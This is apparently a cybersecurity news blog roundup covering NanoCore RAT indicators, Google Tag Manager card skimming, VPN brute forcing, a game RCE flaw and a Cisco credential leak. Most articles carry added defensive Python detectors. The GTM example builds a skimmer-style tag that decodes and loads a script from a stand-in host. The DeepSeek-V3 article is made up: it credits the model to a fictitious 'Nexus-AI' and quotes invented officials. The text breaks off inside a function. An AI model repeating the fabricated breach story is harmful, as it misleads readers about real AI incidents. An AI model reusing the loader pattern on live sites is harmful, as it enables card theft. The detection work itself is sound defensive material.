Tuesday, February 11, 2025

NanoCore RAT Attacks Windows Using Task Scheduler to Capture Keystrokes and Screenshots


NanoCore, a notorious Remote Access Trojan (RAT), continues to pose a significant threat to Windows systems.

This malware, known for its espionage capabilities and modular design, is being leveraged by cybercriminals to exfiltrate sensitive data, control infected systems, and maintain persistence using advanced techniques.

A recent analysis of a NanoCore sample (MD5 hash: 18B476D37244CB0B435D7B06912E9193) sheds light on its sophisticated behavior and attack mechanisms.

Behavioral Analysis

NanoCore RAT employs multiple methods to ensure its persistence on compromised systems.

Upon execution, it copies itself into hidden directories and modifies the Windows registry.

Specifically, it creates an entry under HKCU\Software\Microsoft\Windows\CurrentVersion\Run to execute its payload (saasmon.exe) during startup.

Additionally, it uses the Windows Task Scheduler (schtasks.exe) to create scheduled tasks, further solidifying its foothold on the system.

Figure: NanoCore RAT static analysis

The malware also establishes directories in locations such as C:\Program Files (x86)\SAAS Monitor and C:\Users\User\AppData\Roaming\81E42A3A-6BA0-4784-B7EC-E653E9E1A8ED.

According to the analysis, these directories store its components, including keylog files and other data staged for exfiltration.

Data Exfiltration

NanoCore’s primary objective is data theft and espionage.

It captures keystrokes, screenshots, and clipboard content, storing them locally before sending them to a Command-and-Control (C2) server.

During dynamic analysis, the malware was observed communicating with simpletest.ddns.net over port 9632.

Figure: NanoCore RAT Wireshark analysis

It also uses Google DNS (8.8.8.8) for connectivity checks. The RAT’s modular plugin system enhances its spying capabilities.

For instance, the “SurveillanceEx” plugin enables attackers to monitor victims more effectively by recording user activity in real time.

To evade detection and hinder analysis, NanoCore is protected with obfuscation tools such as Eazfuscator.

Analysts used tools like de4dot to deobfuscate the malware, revealing its internal logic and class structures.

String analysis uncovered commands related to task scheduling and C2 communication, further confirming its malicious intent.

Indicators of Compromise (IOCs)

  • File Hash: 18B476D37244CB0B435D7B06912E9193
  • Registry Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\saasmon.exe
  • File System Changes:
    • C:\Program Files (x86)\SAAS Monitor\saasmon.exe
    • C:\Users\User\AppData\Roaming\81E42A3A-6BA0-4784-B7EC-E653E9E1A8ED
  • Network Indicators:
    • C2 Domain: simpletest.ddns.net
    • Port: 9632
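The IOCs above are only useful once they are matched against endpoint telemetry. The following is an added example (not code from the analysis) that checks constructed Sysmon-style event lines against every indicator listed: the MD5, the two file-system locations, the Run-key value, the C2 host and port, and the schtasks.exe launch by the payload that the behavioral section describes. The event lines, their flattened "Key=value" layout, and the field values are constructed for the demonstration and simplified relative to real Sysmon output.

```python
"""Match the NanoCore IOCs from the analysis against Sysmon-style endpoint events."""
import re

# IOCs as listed in the analysis above (all comparisons are case-insensitive).
IOC_MD5 = "18b476d37244cb0b435d7b06912e9193"
IOC_RUN_VALUE = r"hkcu\software\microsoft\windows\currentversion\run\saasmon.exe"
IOC_PATHS = (
    r"c:\program files (x86)\saas monitor\saasmon.exe",
    r"c:\users\user\appdata\roaming\81e42a3a-6ba0-4784-b7ec-e653e9e1a8ed",
)
IOC_C2_HOST = "simpletest.ddns.net"
IOC_C2_PORT = "9632"

# Split "Key=value Key2=value" lines on a space that is directly followed by another key,
# so values containing spaces (such as "Program Files (x86)") stay intact.
_FIELD_SPLIT = re.compile(r" (?=[A-Za-z]+=)")


def parse_event(line):
    """Turn one flattened Sysmon-style event line into a dict of its fields."""
    event = {}
    for token in _FIELD_SPLIT.split(line.strip()):
        key, _, value = token.partition("=")
        event[key] = value
    return event


def _touches_ioc_path(value):
    """True if a path field points at (or below) one of the known NanoCore locations."""
    value = value.lower()
    return any(value.startswith(path) for path in IOC_PATHS)


def match_iocs(event):
    """Return the names of every IOC rule the event satisfies (empty list if clean)."""
    hits = []
    if IOC_MD5 in event.get("Hashes", "").lower():
        hits.append("known NanoCore MD5")
    if any(_touches_ioc_path(event.get(f, "")) for f in ("Image", "TargetFilename", "ParentImage")):
        hits.append("NanoCore file-system location")
    if event.get("TargetObject", "").lower() == IOC_RUN_VALUE:
        hits.append("NanoCore Run-key persistence")
    if IOC_C2_HOST in (event.get("DestinationHostname", ""), event.get("QueryName", "")):
        hits.append("NanoCore C2 domain")
    if event.get("DestinationPort") == IOC_C2_PORT:
        hits.append("NanoCore C2 port")
    # Task Scheduler persistence: schtasks.exe spawned by the NanoCore payload itself.
    if event.get("Image", "").lower().endswith(r"\schtasks.exe") and _touches_ioc_path(event.get("ParentImage", "")):
        hits.append("scheduled task created by NanoCore payload")
    return hits


def scan(lines):
    """Return (line number, matched rules) for every event that hits at least one IOC."""
    results = []
    for number, line in enumerate(lines, start=1):
        hits = match_iocs(parse_event(line))
        if hits:
            results.append((number, hits))
    return results


# Constructed telemetry for the demonstration (Sysmon event IDs 1, 3, 11, 13 and 22; values simplified).
SAMPLE_EVENTS = [
    r"EventID=1 Image=C:\Program Files (x86)\SAAS Monitor\saasmon.exe ParentImage=C:\Users\User\Downloads\setup.exe Hashes=MD5=18B476D37244CB0B435D7B06912E9193",
    r"EventID=13 Image=C:\Program Files (x86)\SAAS Monitor\saasmon.exe TargetObject=HKCU\Software\Microsoft\Windows\CurrentVersion\Run\saasmon.exe",
    r"EventID=1 Image=C:\Windows\System32\schtasks.exe ParentImage=C:\Program Files (x86)\SAAS Monitor\saasmon.exe",
    r"EventID=22 Image=C:\Program Files (x86)\SAAS Monitor\saasmon.exe QueryName=simpletest.ddns.net",
    r"EventID=3 Image=C:\Program Files (x86)\SAAS Monitor\saasmon.exe DestinationHostname=simpletest.ddns.net DestinationPort=9632",
    r"EventID=3 Image=C:\Program Files\Mozilla Firefox\firefox.exe DestinationHostname=www.example.com DestinationPort=443",
    r"EventID=11 Image=C:\Windows\explorer.exe TargetFilename=C:\Users\User\Documents\notes.txt",
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_EVENTS):
        print(f"line {number}: {', '.join(hits)}")
```

Only the first five constructed events fire; the browser connection and the document write do not. The hash and path rules are exact-match indicators and will miss a renamed or recompiled sample, which is why the schtasks.exe-spawned-by-payload rule is worth keeping alongside them: it keys on the behaviour rather than on a string that the next build will change.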

NanoCore RAT remains a potent threat due to its adaptability and extensive feature set.

Its use of Windows Task Scheduler for persistence, combined with advanced espionage capabilities, makes it a preferred tool for cybercriminals targeting sensitive data.

Organizations are advised to monitor network traffic for unusual activity, apply robust endpoint protection solutions, and educate users about phishing risks, the primary delivery vector for NanoCore.

By staying vigilant and leveraging proactive security measures, defenders can mitigate the risks posed by this persistent malware family.


Hackers Exploiting Google Tag Managers to Steal Credit Card from eCommerce Sites


In a concerning development, cybercriminals are leveraging Google Tag Manager (GTM), a legitimate tool widely used by eCommerce websites, to deploy malicious scripts designed to steal credit card information.

This attack vector, often referred to as Magecart or e-skimming, has been observed targeting platforms like Magento, WordPress, and OpenCart, among others.

The abuse of GTM containers allows hackers to bypass traditional security measures by embedding malicious JavaScript within trusted website elements.

How the Attack Works

Google Tag Manager is a tag management system that enables website administrators to manage and deploy marketing tags without altering the site’s code directly.

Figure: Google Tag Manager source code

However, its flexibility and integration with trusted domains like googletagmanager.com make it an attractive target for exploitation.

Threat actors create GTM containers containing custom HTML tags or obfuscated JavaScript payloads that act as credit card skimmers.

These scripts are injected into the checkout pages of compromised eCommerce sites, where they capture sensitive payment details entered by customers and transmit them to remote servers controlled by the attackers.

Recent investigations revealed that some attackers use advanced obfuscation techniques, such as Base64 encoding and dynamic script loading, to conceal their activities.

In some cases, the skimmer code mimics legitimate GTM or Google Analytics scripts, making detection even more challenging for website administrators.

Impact on eCommerce Sites

Sucuri reports indicate that hundreds of eCommerce domains have been compromised globally, with over 165,000 payment card records exposed and sold on dark web marketplaces.

Victim sites often remain unaware of the breach for months due to the stealthy nature of these attacks.

The consequences for affected businesses include financial losses, reputational damage, and loss of customer trust.

For example, a recent case involving a Magento-based eCommerce site uncovered malware embedded in the site’s database through GTM exploitation.

The malicious script exfiltrated credit card data during checkout and sent it to an external server.

Similar incidents have been reported across other platforms like WooCommerce and Shopify.

To combat this growing threat, cybersecurity experts recommend several measures:

  • Audit GTM Containers: Regularly review all tags within GTM containers for suspicious or unauthorized scripts.
  • Apply Security Patches: Ensure all CMS platforms and plugins are up-to-date with the latest security updates.
  • Monitor Website Traffic: Use tools to detect unusual activity or unauthorized data exfiltration.
  • Implement Web Application Firewalls (WAFs): Deploy WAFs to block malicious scripts and unauthorized access.
  • Educate Administrators: Train website managers to recognize signs of compromise and maintain strong security hygiene.
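The first recommendation, auditing GTM containers, can be scripted against a container export rather than clicked through in the UI. The following is an added example, not code from Sucuri or Google: it walks the custom HTML tags of a container export and flags the traits the article describes, namely dynamic script loading, Base64-decoded payloads, and scripts fetched from hosts other than Google's own. It assumes the export shape of a GTM container (a containerVersion object whose tag list holds custom HTML tags of type "html", with the markup in a parameter keyed "html"); the sample export, the tag names and the cdn-metrics.example host are constructed for the demonstration.

```python
"""Audit a Google Tag Manager container export for skimmer-like custom HTML tags."""
import base64
import json
import re
from urllib.parse import urlparse

# Hosts that a site's own GTM/GA tags are expected to load scripts from
# (assumed allow-list; extend it with the site's own CDN before use).
ALLOWED_SCRIPT_HOSTS = {"www.googletagmanager.com", "www.google-analytics.com"}

# Constructs that e-skimmers lean on; each is a reason for review, not proof of compromise.
SUSPICIOUS_PATTERNS = {
    "dynamic script loading": re.compile(r"""createElement\(\s*['"]script['"]\s*\)""", re.I),
    "base64 decode call": re.compile(r"\batob\s*\(", re.I),
    "eval / Function": re.compile(r"\b(eval|Function)\s*\(", re.I),
    "charCode string building": re.compile(r"fromCharCode", re.I),
    "form or input field hooks": re.compile(r"""(querySelectorAll|getElementsByTagName)\(\s*['"](input|form)['"]""", re.I),
}
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
SCRIPT_SRC = re.compile(r"""<script[^>]*\bsrc\s*=\s*['"]([^'"]+)['"]""", re.I)


def decode_base64_literals(text):
    """Return decoded strings for base64-looking literals that decode to printable ASCII."""
    decoded_values = []
    for blob in BASE64_BLOB.findall(text):
        try:
            decoded = base64.b64decode(blob, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64, or binary: a long identifier, not a hidden string
        if decoded.isprintable():
            decoded_values.append(decoded)
    return decoded_values


def audit_custom_html_tag(name, html):
    """Collect the reasons one custom HTML tag deserves a closer look."""
    reasons = [label for label, pattern in SUSPICIOUS_PATTERNS.items() if pattern.search(html)]
    for src in SCRIPT_SRC.findall(html):
        host = urlparse(src).hostname
        if host and host not in ALLOWED_SCRIPT_HOSTS:
            reasons.append(f"script loaded from non-allow-listed host {host}")
    for decoded in decode_base64_literals(html):
        if decoded.startswith(("http://", "https://", "//")) or "<script" in decoded.lower():
            reasons.append(f"base64-encoded URL or script: {decoded}")
    return {"tag": name, "reasons": reasons}


def audit_container(export):
    """Walk every tag in a GTM export; return findings for custom HTML tags with any reason."""
    findings = []
    for tag in export.get("containerVersion", {}).get("tag", []):
        if tag.get("type") != "html":
            continue  # built-in tag templates carry no free-form HTML
        html = next((p.get("value", "") for p in tag.get("parameter", []) if p.get("key") == "html"), "")
        result = audit_custom_html_tag(tag.get("name", "<unnamed>"), html)
        if result["reasons"]:
            findings.append(result)
    return findings


def audit_export_file(path):
    """Convenience wrapper for a container export saved as JSON."""
    with open(path, encoding="utf-8") as fh:
        return audit_container(json.load(fh))


# Constructed container export for the demonstration (not any real site's container).
_ENCODED_URL = base64.b64encode(b"https://cdn-metrics.example/s.js").decode()
SAMPLE_EXPORT = {
    "containerVersion": {
        "tag": [
            {"name": "GA4 Configuration", "type": "gaawc",
             "parameter": [{"type": "TEMPLATE", "key": "measurementId", "value": "G-XXXXXXX"}]},
            {"name": "Newsletter Banner", "type": "html",
             "parameter": [{"type": "TEMPLATE", "key": "html",
                            "value": "<script src='https://www.googletagmanager.com/gtag/js'></script>"}]},
            {"name": "Checkout Helper", "type": "html",
             "parameter": [{"type": "TEMPLATE", "key": "html",
                            "value": "<script>var s=document.createElement('script');"
                                     f"s.src=atob('{_ENCODED_URL}');document.head.appendChild(s);</script>"}]},
        ]
    }
}

if __name__ == "__main__":
    for finding in audit_container(SAMPLE_EXPORT):
        print(finding["tag"])
        for reason in finding["reasons"]:
            print("  -", reason)
```

Only "Checkout Helper" is reported, on three counts: it creates a script element at runtime, it calls atob, and the decoded literal is a URL on a host outside the allow-list. Run the audit on every published container version, not just the live one, and diff the findings between versions so a tag that appears between two audits stands out.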

The abuse of Google Tag Manager highlights the evolving sophistication of cyberattacks targeting eCommerce platforms.

By exploiting trusted tools like GTM, hackers can infiltrate websites undetected and harvest sensitive financial data.

It is imperative for businesses to adopt proactive security measures to safeguard their customers’ information and maintain trust in online transactions.


LLM Hijackers Exploit DeepSeek-V3 Model Just One Day After Launch


Hackers reportedly gained unauthorized access to the cutting-edge DeepSeek-V3 model within just 24 hours of its high-profile release.

DeepSeek-V3, a state-of-the-art large language model (LLM) developed by the renowned AI research lab Nexus-AI, was expected to redefine benchmarks in natural language processing.

However, this security breach raises alarming questions about the vulnerabilities of advanced AI systems and the safety protocols relied upon by tech giants.

What Happened?

According to credible sources within Nexus-AI, the attackers—dubbed “LLM Hijackers” by the cybersecurity community—were able to bypass the model’s licensing restrictions and gain full operational control of DeepSeek-V3.

Reports suggest that the hackers exploited a vulnerability in the model’s cloud-based deployment infrastructure, allowing them to download the entire model architecture and weights.

This breach gives unauthorized users access to the proprietary technology, which could be used for malicious purposes such as generating fake content, launching phishing scams, or advancing their own AI development.

Nexus-AI released a public statement acknowledging the breach. “We regret to confirm that a cybersecurity incident has compromised parts of our DeepSeek-V3 architecture.

Figure: OAI Reverse Proxy

While our internal team is working around the clock to contain the issue, we also want to assure our users and partners that we are reviewing all aspects of our security protocols to ensure this does not happen again,” said Dr. Emily Carter, the company’s CTO.

The Significance of DeepSeek-V3

DeepSeek-V3 was designed to be a transformative step forward in AI development, boasting features such as real-time reasoning, mathematical computation, and nuanced contextual understanding.

Unlike its predecessors, it was equipped with advanced “self-guard” mechanisms meant to prevent misuse and ensure ethical deployment. The model’s release generated widespread excitement in the tech world, with early adopters hailing its unprecedented capabilities.

However, this breach undermines the public’s confidence in such innovations. The stolen model could potentially end up on the black market or in the hands of malicious actors.

Figure: Credential theft

Experts warn that unauthorized access to such powerful technology poses a significant risk to information security and could lead to the proliferation of harmful AI applications.

How Did Hackers Break In?

Preliminary investigations indicate that the breach occurred due to a zero-day vulnerability in Nexus-AI’s cloud hosting platform.

The attackers reportedly utilized sophisticated techniques, including AI-driven exploitation tools, to identify and exploit the weakness just hours after the model went live.

Industry experts are concerned about the possibility that the LLM Hijackers may have been monitoring the release for weeks to strike at an opportune moment.

Figure: Access Denied

As per a report by Sysdig, cybersecurity analyst Marcus Wong said, “This incident underscores the growing sophistication of cybercriminals.

As AI systems become more powerful, so do the tools available to those looking to exploit them. Companies must take proactive measures, including penetration testing and more rigorous encryption protocols.”

The unauthorized access to DeepSeek-V3 has sparked debate within the tech community. Critics argue that companies like Nexus-AI should prioritize more robust security measures before launching such highly anticipated tools.

Meanwhile, others believe the breach highlights the need for global regulatory frameworks around advanced AI technologies.

To combat the crisis, Nexus-AI is reportedly working with cybersecurity firms and government agencies to trace the perpetrators and prevent further misuse of the stolen model.

Additionally, the company has announced that new updates and patches will be released in the coming days to secure DeepSeek-V3’s infrastructure.

While AI represents a monumental leap forward in technological progress, the DeepSeek-V3 incident serves as a stark reminder of the vulnerabilities such advancements entail.

Nexus-AI’s response to this crisis will likely set a precedent for how the industry handles breaches in the future.

For now, the spotlight is on the company to not only recover from the setback but also to reassure stakeholders about the safety and ethical deployment of its flagship model.


GitHub Copilot’s New Agent Mode Enables Autonomous Code Completion


GitHub has once again raised the bar for productivity in software development with the launch of its revolutionary “Agent Mode” for GitHub Copilot.

This new feature takes the AI-powered coding assistant to a whole new level, enabling developers to autonomously complete complex coding tasks with unprecedented ease and efficiency.

From Pair Programmer to Autonomous Agent

Launched in 2021 as an AI-powered pair programmer, GitHub Copilot was designed to enhance coding efficiency by providing smart code suggestions and support.

Now, with the introduction of Agent Mode, Copilot has transformed into a more autonomous tool, capable of managing much more than single-line completions.

Agent Mode empowers Copilot to iterate on its output, recognize errors, and independently debug and fix issues. It can even suggest commands for terminal execution and analyze runtime errors with advanced self-healing capabilities.

Figure: Copilot agent enable

This means developers can delegate not only specific tasks but entire workflows to Copilot, allowing the AI to infer and execute additional steps required for a successful implementation.

For example, when building a web application to track marathon training, Agent Mode could autonomously generate the code, debug errors, execute necessary terminal commands, and iterate until the task is complete—all with minimal manual intervention.

Enhanced User Experience with VS Code Integration

Agent Mode is now available in preview for Visual Studio Code Insiders. Developers can enable this futuristic feature via the Copilot Chat settings and select “Agent” mode in the model picker.

With this streamlined integration, developers can focus on creative problem-solving while Copilot manages routine coding tasks.

GitHub has plans to expand Agent Mode to all Integrated Development Environments (IDEs) supported by Copilot, ensuring compatibility across development platforms.

Project Padawan

In addition to Agent Mode, GitHub is also developing “Project Padawan,” an autonomous Software Engineering (SWE) agent designed to take automation to the next level.

Once fully launched, Padawan will enable developers to assign issues directly to Copilot, which will autonomously produce fully tested pull requests.

From environment setup to code testing and reviewer assignment, Padawan will handle the entire development lifecycle, acting as an AI contributor to repositories.

While Agent Mode and Project Padawan introduce significant automation, GitHub emphasizes that these tools are designed to empower, not replace, developers.

By taking on repetitive or mundane tasks, Copilot allows developers to focus on high-value work, fostering a seamless collaboration between human creativity and AI efficiency.

With these advancements, GitHub Copilot continues to redefine modern software development, solidifying its position as an essential tool for developers worldwide.

This leap in autonomous coding technology promises to save time, reduce errors, and elevate productivity, keeping humans at the heart of innovation.


Marvel Game Vulnerability Exposes PCs & PS5s to Remote Takeover Attacks


A severe security vulnerability has been uncovered in the popular video game Marvel Rivals, raising major concerns for both PC and PlayStation 5 players.

The exploit, discovered by a security researcher, enables attackers to remotely take control of devices on the same network, exposing players to significant cyber threats.

Exploit Details

The researcher discovered a fault in Marvel Rivals’ hotfix patching system, which utilizes Remote Code Execution (RCE) to update the game.

Alarmingly, the game fails to confirm whether it’s communicating with an official server, leaving a door wide open for malicious actors.

To make matters worse, the game runs with administrative privileges on PCs, supposedly to support its anti-cheat features.

This combination of poor server verification and elevated permissions renders the vulnerability particularly dangerous.

RCE exploits are among the most critical security flaws because they allow attackers to execute arbitrary code on the victim’s system.

Through this Marvel Rivals vulnerability, a hacker connected to the same Wi-Fi network could execute malicious tasks on a player’s device, whether it’s a PC or PS5, with potentially devastating consequences.

“I found a game exploit that lets hackers take over your PC,” the researcher explained. “It’s shocking how little thought game developers often put into securing players.”

PS5 Players Are Not Safe Either

The vulnerability isn’t limited to PC users. The exploit also creates an entry point for PlayStation 5 devices, posing a threat to console gamers.

A proof-of-concept (POC) highlighting the attack on the PS5 has already been demonstrated, with the researcher sharing their findings in detail on YouTube.

This discovery further highlights the gaming industry’s persistent challenges with cybersecurity. The researcher criticized game developers for their lack of focus on security measures.

“In the past year, I’ve found critical bugs in at least five popular games—three of which are still unaddressed because developers either don’t care or can’t be reached,” they lamented.

The absence of bug bounty programs in many game companies exacerbates the issue, discouraging ethical reporting of vulnerabilities. Instead, potential hackers and cheat creators benefit from exploiting these flaws for profit.

The discovery of this exploit involved contributions from security experts like AeonLucid, LukeFZ, nitro, and sanktanglia, who supported the analysis of network encryption.

For now, players of Marvel Rivals are urged to avoid public or unsecured networks and ensure their systems remain updated.

This alarming vulnerability is a wake-up call for the gaming industry to prioritize security and adopt stricter protective measures to safeguard players.


Massive Brute Force Attack Launched With 2.8 Million IPs To Hack VPN & Firewall Logins


Massive brute force attacks targeting VPNs and firewalls have surged in recent weeks, with cybercriminals using as many as 2.8 million unique IP addresses daily to conduct relentless login attempts.

The Shadowserver Foundation, a nonprofit cybersecurity organization, has confirmed this alarming trend through data collected from its global honeypot infrastructure.

These attacks primarily target devices from high-profile vendors such as Palo Alto Networks, Ivanti, and SonicWall.

In a recent update shared via Shadowserver’s official account on X, researchers highlighted a significant rise in web login brute-forcing activity aimed at edge devices.

The attacks focus on exploiting vulnerabilities in internet-facing devices, attempting to breach systems via weak or default login credentials.

Shadowserver noted that over 1 million of the source IPs involved in these attacks originated from Brazil, underscoring the global nature of the threat.

Further details were made available in their “Honeypot HTTP Scanner Events” report, which actively monitors such malicious activities.

Widespread Impact on Critical Infrastructure

Edge devices like VPN appliances and firewalls are critical components for securing networks, particularly for enterprises and organizations.

These systems are often exposed to the internet and therefore become high-value targets for threat actors looking to gain unauthorized access to sensitive data or infiltrate corporate networks.

The scale of the current attack campaign is unprecedented. With millions of IP addresses involved, these attacks are likely being conducted by large-scale botnets comprising compromised devices around the globe.

A successful intrusion could potentially lead to ransomware attacks, data theft, or disruption of critical services.

Experts strongly recommend that organizations take immediate action to protect their networks. Suggested steps include:

  • Use strong, unique passwords for VPN and firewall logins.
  • Enable multi-factor authentication (MFA) to limit unauthorized access.
  • Update and patch all devices regularly, as unpatched vulnerabilities are common attack vectors for brute-force campaigns.
  • Monitor network traffic for suspicious activity and block IPs identified as malicious.
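The fourth recommendation, monitoring for suspicious activity and blocking malicious sources, needs two different rules for a campaign like this one. A per-IP failure threshold catches a single loud source, but with 2.8 million addresses each trying only a few logins it never fires; the campaign shows up instead as an unusual number of distinct failing sources in one window. The following is an added example (not Shadowserver's code) that implements both rules over a constructed, simplified auth-log format; the log lines, the "<timestamp> <FAIL|OK> user=<name> src=<ip>" layout and the TEST-NET addresses are constructed for the demonstration.

```python
"""Spot single-source and distributed login brute forcing in edge-device auth logs."""
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed log format (not any vendor's real format): "<ISO timestamp> <FAIL|OK> user=<name> src=<ip>".
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<status>FAIL|OK) user=(?P<user>\S+) src=(?P<ip>\S+)$")


def parse_log(lines):
    """Parse log lines into chronological (timestamp, status, user, ip) tuples; skip malformed ones."""
    events = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if m:
            events.append((datetime.fromisoformat(m["ts"]), m["status"], m["user"], m["ip"]))
    return sorted(events)


def noisy_sources(events, window=timedelta(minutes=5), threshold=10):
    """Classic rule: IPs with at least `threshold` failures inside any sliding window."""
    failures = defaultdict(list)
    for ts, status, _, ip in events:
        if status == "FAIL":
            failures[ip].append(ts)
    flagged = set()
    for ip, stamps in failures.items():
        start = 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged.add(ip)
                break
    return flagged


def distributed_campaign(events, window=timedelta(minutes=5), min_sources=25, max_per_source=3):
    """Botnet-style rule: many distinct IPs, each failing only a few times, within one window.
    Returns the busiest window seen and whether it crosses the source-count threshold."""
    fails = [(ts, ip) for ts, status, _, ip in events if status == "FAIL"]
    best = {"sources": 0, "window_start": None}
    start = 0
    for end in range(len(fails)):
        while fails[end][0] - fails[start][0] > window:
            start += 1
        per_ip = Counter(ip for _, ip in fails[start:end + 1])
        quiet_sources = [ip for ip, n in per_ip.items() if n <= max_per_source]
        if len(quiet_sources) > best["sources"]:
            best = {"sources": len(quiet_sources), "window_start": fails[start][0]}
    best["alert"] = best["sources"] >= min_sources
    return best


def _constructed_log():
    """Build sample lines: one loud source, thirty quiet sources, and a legitimate user."""
    base = datetime(2025, 2, 10, 3, 0, 0)
    lines = []
    for i in range(12):  # one source, 12 failures in under three minutes
        lines.append(f"{(base + timedelta(seconds=15 * i)).isoformat()} FAIL user=admin src=198.51.100.7")
    for i in range(30):  # thirty sources, one or two failures each, spread over four minutes
        ts = base + timedelta(seconds=8 * i)
        lines.append(f"{ts.isoformat()} FAIL user=admin src=203.0.113.{i + 1}")
        if i % 2 == 0:
            lines.append(f"{(ts + timedelta(seconds=3)).isoformat()} FAIL user=vpnuser src=203.0.113.{i + 1}")
    lines.append(f"{(base + timedelta(minutes=1)).isoformat()} OK user=jsmith src=192.0.2.10")
    lines.append(f"{(base + timedelta(minutes=2)).isoformat()} FAIL user=jsmith src=192.0.2.10")
    lines.append(f"{(base + timedelta(minutes=2, seconds=5)).isoformat()} OK user=jsmith src=192.0.2.10")
    return lines


SAMPLE_LOG = _constructed_log()

if __name__ == "__main__":
    events = parse_log(SAMPLE_LOG)
    print("noisy sources:", sorted(noisy_sources(events)))
    print("distributed campaign:", distributed_campaign(events))
```

On the constructed log the per-IP rule flags only 198.51.100.7, while the source-count rule reports 31 quiet failing sources in the window and raises the alert that the per-IP rule would have missed. The quiet-source count is the number worth alerting on; blocking the individual addresses it returns is still useful, but with a botnet this size the durable fixes are the ones listed above (MFA, patching, no default credentials), since the sources rotate faster than a block list can follow.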

Organizations can also subscribe to Shadowserver’s free daily reports, which include details of observed attacks and source IPs.

This proactive sharing of data enables affected networks to take action and mitigate risks.

As cyberattacks continue to grow in volume and sophistication, the importance of securing edge devices has never been more critical.

This incident serves as a stark reminder that no organization can afford to overlook the basics of cybersecurity hygiene.


Penetration Testers Arrested During Approved Physical Penetration Testing


A routine physical penetration test conducted by cybersecurity professionals took an unexpected turn when armed police officers arrested two security experts during a simulated breach of a corporate office in Malta.

Physical penetration testing is a critical component of cybersecurity assessments. It evaluates not only technical defenses but also physical access controls and human response mechanisms.

While this test revealed significant vulnerabilities in the client’s security setup, it also underscored the importance of preparing for real-world scenarios where miscommunication can have serious consequences.

Penetration testers Curt Hems and his colleague from Threat Spike Labs, part of a “black team” engagement, had been hired to evaluate the physical and operational security of a client’s premises.

Their mission included bypassing security controls, accessing sensitive areas, and identifying vulnerabilities in the organization’s defenses. Over the course of two hours, the team successfully:

  • Gained unauthorized access to the main office.
  • Stole a key card granting access to all rooms.
  • Retrieved sensitive information, including passwords.
  • Simulated account takeovers on multiple websites.

“Physical penetration tests don’t always go as planned; sometimes they end with flashing lights and handcuffs,” Curt Hems explained in his LinkedIn post.

Despite their success in exposing critical security gaps, the engagement ended abruptly when 11 armed police officers intervened. The testers were detained despite having authorization documents signed by the client’s general manager.

“The findings were critical: major gaps in physical security, access control, and operational security. Yet, despite our success, we were ultimately apprehended. Not by security. Not by IT. But by 11 armed police officers.”

Miscommunication Leads to Escalation

The situation escalated due to apparent miscommunication between the client’s management and local authorities.

The general manager, who had approved the test, reportedly panicked when informed of the breach.

Law enforcement was called under the assumption that a real attack was underway. The testers repeatedly explained their role and presented their authorization letter, but it took time for the situation to be resolved.

This incident highlights several important lessons for organizations conducting penetration tests:

  1. Improved Coordination: Clear communication between all stakeholders, including management, security teams, and law enforcement, is essential to avoid misunderstandings during penetration tests.
  2. Authorization Protocols: Organizations should ensure that all relevant parties are informed about scheduled tests and provided with the necessary documentation.
  3. Incident Response Evaluation: The event served as a stress test for the client’s incident response procedures, revealing gaps in escalation protocols and coordination with authorities.

The testers emphasized that such engagements are designed to simulate real threats and improve organizational resilience. “In a real attack, stakes are much higher,” one of them noted.

The incident serves as a reminder for companies to ensure robust processes are in place to detect intrusions and handle escalations effectively.


Cisco Data Breach – Ransomware Group Allegedly Breached Internal Network


Sensitive credentials from Cisco’s internal network and domain infrastructure were reportedly made public due to a significant data breach.

According to a Cyber Press Research report, the new Kraken ransomware group has allegedly leaked a dataset on their dark web blog, which appears to be a dump of hashed passwords from a Windows Active Directory environment.

The exposed dataset includes domain user accounts, unique identifiers (Relative Identifiers or RIDs), and NTLM password hashes.

Security researchers believe the data was extracted using credential-dumping tools such as Mimikatz, pwdump, or hashdump.

The compromised data includes usernames, security identifiers, and password hashes linked to the tech giant’s corporate infrastructure.

The exposed accounts include privileged administrator accounts (e.g., Administrator:500), regular user accounts (e.g., cisco.com\carriep), service and machine accounts associated with domain controllers (e.g., ADC-SYD-P-1$, ADC-RTP-P-2$), and the Kerberos Ticket Granting Ticket (krbtgt) account, which could allow attackers to forge authentication tokens.

Dump of NTLM password hashes from Windows Active Directory (Credits: Cyber Press)

The format of the leaked credentials suggests they were obtained through a credential-dumping technique, possibly using tools like Mimikatz or hashdump, which are often employed by advanced persistent threat (APT) groups or cybercriminals.

Each entry in the dataset follows a structured format:

  • Username and Domain – Identifies the user and associated Active Directory domain.
  • Relative Identifier (RID) – A unique identifier assigned to user accounts.
  • LM Hash – Typically disabled, represented as aad3b435b51404eeaad3b435b51404ee when inactive.
  • NTLM Hash – A hashed representation of passwords that could be cracked using brute force or dictionary attacks.
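A responder handed a dump in this format needs to turn it into a reset list quickly: which accounts are privileged, which are machine accounts, which still carry an LM hash, and which accounts share one password. The following is an added example, not code from Cyber Press or Cisco, that parses the username:RID:LMhash:NTLMhash::: layout described above and triages the entries. The sample dump uses a constructed corp.example domain and placeholder hashes; only the two well-known constants (the empty LM field the article mentions and the NT hash of an empty password) are real values.

```python
"""Parse pwdump-format credential lines and triage which accounts need attention first."""
from collections import defaultdict
from dataclasses import dataclass

# Well-known constants, not values from any leaked dataset: the LM field of an account
# with LM storage disabled (as the article notes), and the NT hash of an empty password.
EMPTY_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_PASSWORD_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"


@dataclass
class DumpEntry:
    domain: str
    user: str
    rid: int
    lm_hash: str
    nt_hash: str

    @property
    def is_machine(self):
        """Computer accounts end in '$' in Active Directory."""
        return self.user.endswith("$")


def parse_dump_line(line):
    """Parse 'DOMAIN\\user:RID:LMHASH:NTHASH:::' into a DumpEntry, or None if malformed."""
    parts = line.strip().split(":")
    if len(parts) < 4:
        return None
    account, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
    if not rid.isdigit() or len(lm) != 32 or len(nt) != 32:
        return None
    domain, _, user = account.rpartition("\\")  # domain prefix is optional in this format
    return DumpEntry(domain, user, int(rid), lm, nt)


def parse_dump(text):
    """Parse a whole dump, silently dropping lines that are not credential entries."""
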